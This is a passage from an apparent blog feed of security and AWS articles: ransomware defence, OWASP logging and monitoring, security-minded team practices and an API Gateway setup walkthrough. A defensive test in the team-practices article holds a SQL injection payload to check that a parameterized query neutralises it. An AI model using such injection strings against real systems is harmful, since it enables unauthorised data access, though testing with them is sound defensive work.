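def verify_backup(path: Path, expected: str) -> bool:
    """Compare a backup file against the checksum stored in a manifest."""
    return checksum(path) == expected
```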

&lt;h3&gt;
  
  
  7. Encrypt data at rest
&lt;/h3&gt;

&lt;p&gt;Encrypting your own data won't prevent a ransomware attack, but it may help alleviate extortion threats in the event of a successful attack. By ensuring that your data is encrypted, you can be fairly confident that the attackers don't have any sensitive data that they can release or sell. This approach may come with some tradeoffs, however. Encrypting data at rest means it will need to be decrypted before it can be used by your organization. In some cases this may not be an issue, but when performance and speed are a high priority, it may not make sense, depending on the data being stored. If the data is highly sensitive, such as financial or healthcare information, the performance hit may be worth it.&lt;/p&gt;
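
&lt;p&gt;As a rough sketch of that decrypt-on-read cost, the snippet below uses the third-party &lt;code&gt;cryptography&lt;/code&gt; library's Fernet recipe (the record contents are made up, and real key management belongs in a KMS or HSM, not in application memory):&lt;/p&gt;

```python
from cryptography.fernet import Fernet  # third-party: pip install cryptography

# Illustration only: in production the key comes from a KMS/HSM, never code.
key = Fernet.generate_key()
fernet = Fernet(key)

record = b"ssn=123-45-6789"               # hypothetical sensitive record
stored = fernet.encrypt(record)           # what actually lands on disk
assert stored != record                   # ciphertext leaks nothing useful
assert fernet.decrypt(stored) == record   # every read pays the decrypt cost
```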

&lt;p&gt;Unfortunately, there's no silver bullet to guarantee you'll never be the victim of a ransomware attack, but implementing these suggestions will go a long way in shoring up your defenses.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>OWASP Top 10 for Developers: Insufficient Logging and Monitoring</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 15 Mar 2021 07:17:01 +0000</pubDate>
      <link>https://forem.com/leading-edje/owasp-top-10-for-developers-insufficient-logging-and-monitoring-41oa</link>
      <guid>https://forem.com/leading-edje/owasp-top-10-for-developers-insufficient-logging-and-monitoring-41oa</guid>
      <description>&lt;p&gt;The OWASP Top 10 is an open-source project that lists the ten most critical security risks to web applications. By addressing these issues, an organization can greatly improve the security of their software applications. Unfortunately, many developers aren't familiar with the list, or don't have a thorough understanding of the vulnerabilities and how to prevent them. In this series, I'm going to break down each of the vulnerabilities on the list, explain what each one is, how to identify it in your projects, and how to prevent it.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a href="https://owasp.org/www-project-top-ten/2017/A10_2017-Insufficient_Logging%2526Monitoring"&gt;Insufficient Logging and Monitoring&lt;/a&gt;
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What is it?
&lt;/h3&gt;

&lt;p&gt;This vulnerability stems from an application not logging important events as they take place. A lack of logging within an application, or not properly monitoring and responding to application logs, can allow an attack to continue when it could have been caught and terminated had proper controls been in place. It also makes it difficult to reconstruct the events of an attack so that vulnerabilities can be identified and addressed. Most applications do some level of logging, but it's important to understand what should be logged, where those logs should be stored, how they should be monitored, and how the security team should respond to suspected attacks.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you identify it?
&lt;/h3&gt;

&lt;p&gt;Identifying this type of vulnerability isn't as easy as looking for a specific line in the code. This vulnerability actually occurs due to a lack of code. Because of this, it may be difficult to understand where your application stands with regard to security logging.&lt;/p&gt;

&lt;p&gt;The first step is to determine what logging is currently present within your application. There may be other purposes for your logging activity, such as debugging or for data analytics. Identify where logging is taking place within your application and what it's being used for.&lt;/p&gt;

&lt;p&gt;Next, you'll need to determine where the data is being logged. Is there a log file stored on the same machine that's running the application? Is there a central logging system where multiple applications are logging information? Are security logs being stored alongside debugging or analytics logs? Is the log data being stored in a cloud service, such as AWS CloudWatch, that monitors your entire account?&lt;/p&gt;

&lt;p&gt;Finally, you need to determine how the logged data is being monitored and acted on. Is the data being fed into an intrusion detection system? Are there rules in place to trigger alerts for suspicious activity? Are there plans in place for responding to these alerts?&lt;/p&gt;

&lt;p&gt;If you've determined that you are logging security data, you will need to ensure that the data being logged is sufficient to identify an attempted attack. This can be difficult if you don't have data from a previous attack available to review. If you're not sure if you're logging the correct data, OWASP suggests that reviewing the log files following a penetration test is a good way to determine how thorough your logging is. The logs should show the tester's scanning and attack attempts, and should provide enough information to determine the actions they took within the system, and the data they were able to access.&lt;/p&gt;

&lt;p&gt;If your application is not logging security data, or the logs don't provide enough data to identify and track an attacker, then you need to add additional logging to your application.&lt;/p&gt;

&lt;h3&gt;
  
  
  How can you prevent it?
&lt;/h3&gt;

&lt;p&gt;Reducing this risk is a matter of ensuring that you are collecting data related to security functions within your application, that the data collected is monitored for potential attacks, and that proper alerting is in place. Here are some guidelines for implementing proper logging:&lt;/p&gt;

&lt;h4&gt;
  
  
  1. Identify what events and data should be logged.
&lt;/h4&gt;

&lt;p&gt;First, you'll need to determine which events need to be monitored. This will include things like login attempts, login failures, attempts to access restricted pages, input validation failures, and modification of application data. Once you've identified the events to be logged, you need to determine what data should be recorded with each one. You'll want to include a timestamp in all logs, and if you're logging from multiple applications or services, you'll want to ensure that the timestamps are synced across services. You should also log some type of identifying information, such as the IP address or the user ID. You may also want to include a severity level based on the type of activity being logged. For example, a successful login may be logged as a low-severity event, while a failed login attempt may be logged as a high-severity event. You should avoid storing sensitive data in your log records, such as passwords, credit card numbers, or social security numbers. Additionally, log data should be considered untrusted, and should be properly sanitized to prevent log injection or log forging. This is by no means an exhaustive list. The events that need to be logged, and the data recorded, will be determined by your organization's specific needs. Whatever data you choose to log, make sure it's in a common format that can be parsed by monitoring tools.&lt;/p&gt;
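
&lt;p&gt;A minimal sketch of this kind of structured security logging, using Python's standard &lt;code&gt;logging&lt;/code&gt; and &lt;code&gt;json&lt;/code&gt; modules (the field names and the severity mapping are illustrative choices, not a standard schema):&lt;/p&gt;

```python
import json
import logging
from datetime import datetime, timezone

security_log = logging.getLogger("security")
security_log.setLevel(logging.INFO)

def log_event(event: str, user_id: str, source_ip: str, severity: str) -> str:
    """Emit one security event as a single JSON line (machine-parseable)."""
    record = {
        # UTC timestamp so entries from different services can be correlated.
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "event": event,
        "user_id": user_id,      # identifying info -- never the password itself
        "source_ip": source_ip,
        "severity": severity,
    }
    line = json.dumps(record)
    security_log.info(line)
    return line

# A failed login is logged at a higher severity than a successful one.
log_event("login_success", "user42", "203.0.113.7", "low")
log_event("login_failure", "user42", "203.0.113.7", "high")
```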

&lt;h4&gt;
  
  
  2. Determine where log data will be stored.
&lt;/h4&gt;

&lt;p&gt;If possible, security logs should be sent to a central location separate from the device running the application. If the application is deployed in a cloud environment, use the cloud provider's logging services. In either case, the log storage needs to have strict security controls in place to prevent tampering with or deleting log records. The logs should also be stored in a manner that allows them to be easily ingested by a monitoring tool. You'll also need to determine a retention policy for your log data. The amount of time logs are kept may be determined by law, if you're in a regulated industry, or it may be a matter of corporate policy. Either way, the retention period should be sufficient to allow forensic analysis of the records should an attack take place.&lt;/p&gt;

&lt;h4&gt;
  
  
  3. Determine how logs will be monitored.
&lt;/h4&gt;

&lt;p&gt;Once you've decided which events to log, and where they'll be stored, you have to decide how these logs will be monitored. There are numerous third-party and open-source options available for log monitoring. If you're using a cloud provider, their logging service will most likely have built-in monitoring and alerting available. Depending on the monitoring tool being used, there may be automated actions that can be configured to help stop attacks when suspicious activity is detected. If you're using one of these tools, you'll need to determine the thresholds that should be set, and the actions that should be taken, e.g., invalidating session tokens or locking a user's account.&lt;/p&gt;
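
&lt;p&gt;The threshold logic itself is simple enough to sketch. The numbers below (five failures within sixty seconds) are arbitrary examples, and a real deployment would let the monitoring tool, not the application, keep the counters:&lt;/p&gt;

```python
import time
from collections import defaultdict, deque
from typing import Deque, Dict, Optional

FAILURE_THRESHOLD = 5   # failures that trigger the action...
WINDOW_SECONDS = 60     # ...within this sliding window

_failures: Dict[str, Deque[float]] = defaultdict(deque)

def record_failed_login(user_id: str, now: Optional[float] = None) -> bool:
    """Record one failed login; return True when the account should be locked."""
    now = time.time() if now is None else now
    window = _failures[user_id]
    window.append(now)
    # Discard events that have aged out of the sliding window.
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()
    return len(window) >= FAILURE_THRESHOLD
```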

&lt;h4&gt;
  
  
  4. Set up alerts for suspicious activity and respond appropriately.
&lt;/h4&gt;

&lt;p&gt;While logs are valuable for determining what happened in the aftermath of an attack, their real value lies in the ability to detect and respond to attacks in real time. Setting up appropriate alerts for specific events allows your security team to monitor activity and take immediate action to protect your data. You'll need to determine which types of events, and at what threshold, these alerts should be triggered. You should also have an incident response plan in place for dealing with security breaches. Guidance for developing an effective incident response plan can be found in the &lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf"&gt;NIST Computer Security Incident Handling Guide&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Thorough logging and monitoring are essential to the security of your applications. This information is crucial for identifying and stopping attacks against your systems. With proper logging in place, you can identify suspicious activity before an intruder has a chance to access your sensitive data or gain a foothold on your system.&lt;/p&gt;

&lt;h3&gt;
  
  
  References
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://owasp.org/www-project-top-ten/2017/A10_2017-Insufficient_Logging%2526Monitoring"&gt;OWASP Top 10 Project: 10. Insufficient Logging and Monitoring&lt;/a&gt;&lt;br&gt;
&lt;a href="https://owasp.org/www-project-proactive-controls/v3/en/c9-security-logging"&gt;OWASP Proactive Controls&lt;/a&gt;&lt;br&gt;
&lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html"&gt;OWASP Logging Cheat Sheet&lt;/a&gt;&lt;br&gt;
&lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf"&gt;NIST Computer Incident Response Handling Guide&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>Cultivating a Security Focused Development Team</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 15 Mar 2021 04:09:43 +0000</pubDate>
      <link>https://forem.com/leading-edje/cultivating-a-security-focused-development-team-4g1g</link>
      <guid>https://forem.com/leading-edje/cultivating-a-security-focused-development-team-4g1g</guid>
      <description>&lt;p&gt;"Security is everyone's responsibility." If you've worked in a corporate environment, I'm sure you've heard this phrase before. It usually appears as part of an annual, required security training. Then you spend the next 15 to 30 minutes learning about the dangers of opening files attached to emails and how to avoid common phishing scams. If you're a software developer, chances are you slog through these annual refreshers with mild annoyance, as quickly as possible, so you can get back to your actual work. &lt;/p&gt;

&lt;p&gt;As advanced users of technology, we like to believe we're smart enough to recognize phishing attempts without hearing the same old warnings about not opening .exe files from someone you don't know. But while developers may be less likely to fall for common social engineering attacks like phishing, that doesn't mean we can't still make extremely costly security mistakes. With the constant push for faster and faster development cycles, it's easy to get so focused on solving the problem at hand that little security issues can slip by. The phrase may have become a bit of a cliché, but it's no less true: "Security is everyone's responsibility." So what can you do to help foster an atmosphere of security-first development within your organization?&lt;/p&gt;

&lt;h2&gt;
  
  
  The "Shift-Left" trend
&lt;/h2&gt;

&lt;p&gt;The "shift-left" paradigm has been making it's way through the DevOps community over the past few years. The general idea is to move security to the left on the SDLC timeline by incorporating security controls earlier in the development process. This concept has grown in popularity with the rise of CI/CD practices. &lt;/p&gt;

&lt;p&gt;Personally, I'm not a big fan of the term for a couple of reasons. First, "shift" implies moving something from one place to another. I think the desire to implement security earlier in the process is great, but organizations shouldn't take this to mean they can replace their current security testing with some CI/CD security tools and call it a day. If you do end-of-cycle, pre-production security tests, these still need to happen. You may need to make some modifications to the process if this type of testing causes a bottleneck, but don't let this "shift left" idea lead you to believe you only need to have security checks at a single point in the development process.&lt;/p&gt;

&lt;p&gt;The second issue I have with this concept is the way software vendors have latched onto it, as they always do, to convince you that all you need to implement the "shift left" paradigm in your organization is to integrate their tool into your development workflow. Most of these are some form of static or dynamic code analysis tools. Some of these are probably really good tools, and adding code scanning is an important part of the "shift left" philosophy, but it can't be the only thing you do. &lt;/p&gt;

&lt;p&gt;If you truly want to make this type of shift within your organization, and you absolutely should, it takes much more than a code scanning tool. It requires not only a shift in security controls, but also in the way your organization thinks about security as a whole. Just like DevOps required a shift in the way we think about the intersection of development and operations, DevSecOps requires understanding how security fits into the overall software development process. It requires you to convince your entire team (developers, managers, product owners, designers, and QA testers) that security really &lt;em&gt;is&lt;/em&gt; their responsibility.&lt;/p&gt;

&lt;h2&gt;
  
  
  Creating a Security-Rich Atmosphere
&lt;/h2&gt;

&lt;p&gt;If you're looking to foster this type of security-rich environment for your development team, you'll need to get buy-in across your organization. It needs to be clear to everyone that they are a part of the security team. Likewise, your security engineers need to be made a part of the development team. This can seem like a pretty big shift in roles, but here are some things you can do to start building this type of collaborative relationship:&lt;/p&gt;

&lt;h4&gt;
  
  
  1. Provide secure coding training for your developers.
&lt;/h4&gt;

&lt;p&gt;You need to make sure your developers understand secure coding practices. This is especially important if you're hiring a lot of junior developers. Many of these developers may have very little knowledge of secure coding practices. They may have never heard of a SQL injection or a cross-site scripting attack. They may see patterns established by your senior developers, like parameterized queries, but they may not understand the "why" behind these patterns. Sometime down the road, these developers may stray from the established patterns because they don't understand the reasons they were written that way in the first place. It's essential that all of your developers have a fundamental understanding of secure coding practices.&lt;/p&gt;

&lt;h4&gt;
  
  
  2. Include security engineers in your Agile teams.
&lt;/h4&gt;

&lt;p&gt;I've worked with numerous clients using some form of Agile. The Agile teams are usually made up of some combination of developers, architects, BAs, Scrum masters, product owners, QA testers, and graphic designers, but I have yet to work at a client where they include a security engineer as part of the Agile team. This seems like a major missed opportunity, and could prove incredibly valuable for spreading security throughout your organization. As a member of the Agile team, you have someone to answer security questions during planning and to call out any issues they see before development work even starts on a story. This can help prevent defects and avoid rework. This also helps eliminate the imaginary wall that often separates development teams from the security team within an organization. Working together on a daily basis allows these teams to share knowledge and come up with solutions that prioritize both the business objectives and the security of the organization.&lt;/p&gt;

&lt;h4&gt;
  
  
  3. Identify security champions within your development teams.
&lt;/h4&gt;

&lt;p&gt;If you want to spread security awareness across your teams, it's important to identify individuals who already show a passion for security on your current team. These people can be leaders in the push to foster a security-first attitude. This is especially important if you don't have the ability to insert security engineers into your Agile teams. Provide additional training to these developers, and they'll be able to take on some of the security focus during planning. They can also help mentor more junior developers on secure coding practices.&lt;/p&gt;

&lt;h4&gt;
  
  
  4. Include security scenarios in your automated testing.
&lt;/h4&gt;

&lt;p&gt;If you're doing automated QA testing, consider including security scenarios in these tests. Test input fields for SQL injections and ensure the proper errors are returned, for example. This can be especially helpful for testing common security vulnerabilities in fast-moving continuous deployment projects. This type of automated testing shouldn't take the place of thorough manual testing or penetration tests, but it can provide a good solution for preventing regressions in your code base. If you've included a security engineer on your Agile team, this is a great time for them to collaborate with your automated QA team to figure out which scenarios can be tested this way.&lt;/p&gt;
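
&lt;p&gt;As an illustration of the kind of regression test this enables, the sketch below uses Python and an in-memory SQLite database as stand-ins for a real application, and asserts that a classic SQL injection payload is treated as an inert literal by a parameterized query:&lt;/p&gt;

```python
import sqlite3

def find_user(conn: sqlite3.Connection, username: str):
    # Parameterized query: user input can never alter the SQL structure.
    cur = conn.execute("SELECT id FROM users WHERE name = ?", (username,))
    return cur.fetchone()

def test_sql_injection_is_inert():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    # The payload matches no user and leaks no rows.
    assert find_user(conn, "' OR '1'='1") is None
    assert find_user(conn, "alice") == (1,)

test_sql_injection_is_inert()
```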

&lt;h4&gt;
  
  
  5. Require a security-specific code review
&lt;/h4&gt;

&lt;p&gt;This is a big one, and probably my favorite tip for increasing security consciousness within a development team. It does introduce another step into the development workflow, and it may slow things down a little bit, but the benefits can be huge. The idea is that when a developer has a change that's ready to deploy, their code goes through the normal peer review process. This initial review is for code quality; ensuring that best practices and established patterns have been followed. Once this is approved, a second review is required. This review focuses specifically on security issues that might be caused by the change. The reviewer is less worried about the code, and more about the security implications. What is the risk level of the changes made? Is there any PII involved in the change? Are display changes properly scoped so they will only be seen by authorized users? Is any new data being transmitted to a third-party partner? Are any new dependencies being added to the project? Have unit tests been written that thoroughly cover any areas of concern? It may help to identify the primary questions that need to be asked and provide a checklist for reviewers to use. The great thing about this type of review is that it not only helps to catch security bugs before they're released to production, but it also helps emphasize to your developers how seriously you take code security, and it provides great learning opportunities for your team. Your developers are forced to consider security during development, the reviewer is required to think through the potential security implications of each change, and when an issue is pointed out, it's an opportunity for the reviewer to share knowledge with the developer.&lt;/p&gt;

&lt;h4&gt;
  
  
  6. Integrate automated tools into the development workflow.
&lt;/h4&gt;

&lt;p&gt;In order to ensure the best security for your applications, you'll need to include some automated tools in your development process. These may include things like static code analysis tools, dynamic code analysis tools, dependency scans, etc. There are both commercial and open-source tools available in each category, and which tools you need will be determined by your own organization's needs. These tools provide additional layers of security to your development pipeline, but they shouldn't be relied on too heavily. I included this tip last for a reason. No matter how many automated tools you throw in the pipeline, they can never compete with the benefits gained by fostering a truly security-focused atmosphere within your organization.&lt;/p&gt;

&lt;p&gt;Shifting a development team to a security-first attitude is no small task. There will undoubtedly be push-back, but as developers, we play a huge role in an organization's digital footprint, and we have a responsibility to ensure that we've done all we can to limit the risk involved in any changes we make. At the same time, our organization has a responsibility to ensure that their developers have the tools and training they need to write secure code. Implementing the tips above is a good starting point for making the shift to a truly security-focused development team.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
    </item>
    <item>
      <title>Getting Started with AWS API Gateway</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 16 Dec 2020 10:19:34 +0000</pubDate>
      <link>https://forem.com/leading-edje/getting-started-with-aws-api-gateway-18bo</link>
      <guid>https://forem.com/leading-edje/getting-started-with-aws-api-gateway-18bo</guid>
      <description>&lt;p&gt;In my &lt;a href="https://dev.to/leading-edje/what-s-an-api-gateway-and-how-do-you-choose-the-right-one-12pk"&gt;last article&lt;/a&gt;, I talked about what an API gateway is, and some things you should consider when choosing the right gateway solution for your organization. Today, I thought I'd dive a little deeper into one of those solutions, AWS's API Gateway.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why API Gateway?
&lt;/h3&gt;

&lt;p&gt;I've used API Gateway on a few projects, and it's a great option, especially if you're going to be using other AWS services. It provides fine-grained control of your API endpoints, giving you a single point of entry for your API. You can define rules for which endpoints point to which services and which users have access to which resources. API Gateway can handle authentication using IAM, Cognito user pools, or custom authorization functions. &lt;/p&gt;

&lt;h3&gt;
  
  
  The Drawbacks
&lt;/h3&gt;

&lt;p&gt;Despite all of its great features, there are a few things about API Gateway that you need to be aware of. One of the biggest drawbacks of API Gateway is also one of its biggest benefits. Since it's a fully managed service, you don't have to worry about managing the underlying hardware, but that means you also don't have the ability to do any customization or performance tuning.&lt;/p&gt;

&lt;p&gt;There are also some quotas and limits that Amazon imposes on API Gateway that you need to be aware of. For example, you're limited to 600 APIs per account, and 300 routes per API. There's also a throttle of 10,000 requests per second. Some of these limits can be increased on request, but others can't. Most of the limits are fairly high and probably won't be an issue for most organizations, but they are something you'll need to keep in mind. Check out the API Gateway docs for the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/limits.html" rel="noopener noreferrer"&gt;full list of limitations&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Setting Up API Gateway
&lt;/h3&gt;

&lt;p&gt;With that out of the way, let's take a look at how to set up API Gateway. For this example, I've got two Lambdas set up. They're just simple functions that return some static data, but what they do isn't really important for our purposes. We just need something to call from our gateway.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F1ds35ro3uk6rluqgruii.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F1ds35ro3uk6rluqgruii.png" alt="The dummy Lambda functions"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To get started we first have to choose which type of API we're going to create. There are currently four types to choose from: HTTP API, WebSocket API, REST API, and REST API Private. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faku31w930ofkhgbd4naz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faku31w930ofkhgbd4naz.png" alt="API Type Options"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, what's the difference? We'll start with the easy ones. The WebSocket API obviously stands out on its own. It would be used when you need a persistent connection to your backend services. This would be good for something like a real-time chat app, or a dashboard that needs to be updated continuously. The only difference between the REST API and the REST API Private is that the latter is only available within a VPC.&lt;/p&gt;

&lt;p&gt;That leaves us with HTTP API and REST API. These are the two that most organizations will be choosing from. The descriptions on the selection screen aren't very useful, but luckily the docs have a page that &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html" rel="noopener noreferrer"&gt;breaks down the differences&lt;/a&gt; between the two. The TL;DR is that the HTTP API is the newer service. It's optimized to provide low-latency integrations with AWS services, and provides support for OAuth 2.0 and OIDC authorization. There's also built-in support for CORS and automatic deployments. The REST API, on the other hand, is the older service, and while it doesn't support some of the newer features of the HTTP API, it supports quite a few other features that the HTTP API doesn't support yet. Take a look at the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html" rel="noopener noreferrer"&gt;docs&lt;/a&gt; for full details. For this demo, we'll be using the HTTP API.&lt;/p&gt;

&lt;p&gt;To create the API, you can choose to import an OpenAPI 3 definition, if you have one, or you can build it from scratch, which is what we'll do.&lt;/p&gt;
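
&lt;p&gt;If you do have a definition to import, even an abridged OpenAPI 3 sketch like the one below conveys the idea (the title and paths are placeholders, and in a real import each operation would carry an &lt;code&gt;x-amazon-apigateway-integration&lt;/code&gt; extension pointing at its Lambda or HTTP backend):&lt;/p&gt;

```yaml
openapi: "3.0.1"
info:
  title: demo-http-api   # placeholder name
  version: "1.0"
paths:
  /users:
    get: {}     # would integrate with the users Lambda
  /posts:
    get: {}     # would integrate with the posts Lambda
    post: {}
  /photos:
    get: {}     # would integrate with the external HTTP endpoint
```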

&lt;h3&gt;
  
  
  Step 1: Add Integrations
&lt;/h3&gt;

&lt;p&gt;In the first step, we'll add the integrations with our Lambda functions. You can also integrate with any HTTP endpoint, so we'll throw in an extra integration with a test API just for fun.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftv88ntevw7gwvi0n65hl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftv88ntevw7gwvi0n65hl.png" alt="Step 1: Add Integrations"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Configure Routes
&lt;/h3&gt;

&lt;p&gt;In step two, we'll add our routes. We'll create four routes in this case: a GET route to hit our &lt;code&gt;users&lt;/code&gt; lambda, GET and POST routes to hit our &lt;code&gt;posts&lt;/code&gt; lambda, and a GET route to hit the &lt;code&gt;photos&lt;/code&gt; HTTP endpoint. You can create as many routes as you need, and each one can hit whichever integration is appropriate. In some cases, you may have one lambda integration for each route, or you may have several routes that all point to the same lambda. You can also specify which methods each endpoint supports. If this was a real application with the normal CRUD functionalities, we might create routes for the GET, POST, PUT and DELETE methods for each endpoint, or we could delegate the responsibility for determining the response to the lambda using an ANY method.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fps9bn3hv2gs4hc1dr59f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fps9bn3hv2gs4hc1dr59f.png" alt="Step 2: Configure Routes"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Define Stages
&lt;/h3&gt;

&lt;p&gt;Next we'll define the stages for our API. Stages are individual environments that you can deploy your API configuration changes to. We're going to create two stages: dev and prod. We'll turn on the Auto-deploy option for the dev environment, but leave it off for prod. This gives us the chance to test our changes in dev, then manually deploy them to prod once we're satisfied that everything works properly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fh23dufee8rb6avu5b6vu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fh23dufee8rb6avu5b6vu.png" alt="Step 3: Define Stages"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Review and Create
&lt;/h3&gt;

&lt;p&gt;The final step in the build process just gives you a chance to review your configuration before your API is created. If you see anything that needs to be changed, you can click the edit button for that section to make updates. Everything looks good, so we'll go ahead and hit Create.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F12zmfwh31cfojpyygg17.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F12zmfwh31cfojpyygg17.png" alt="Step 4: Review and Create"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Gateway Dashboard
&lt;/h3&gt;

&lt;p&gt;Once our API is created, we're redirected to the Gateway Dashboard.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fhwk2vzwnlrowi75c8yjh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fhwk2vzwnlrowi75c8yjh.png" alt="The Gateway Dashboard"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, we now have access to a lot more configuration options. Let's take a look at a few of these.&lt;/p&gt;

&lt;h3&gt;
  
  
  Authorization
&lt;/h3&gt;

&lt;p&gt;You have the option of adding an authorizer for each method of each endpoint. This fine-grained control lets you specify who has access to which of your services. In this example, we may want to allow anyone to fetch posts, but only authorized users to create them.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Foj90lfnr32g9q8wun0j1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Foj90lfnr32g9q8wun0j1.png" alt="Authorization Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now when we test our endpoints, we can see that the GET /posts method returns the array of posts, while the POST /posts method returns a 403 Forbidden status.&lt;/p&gt;

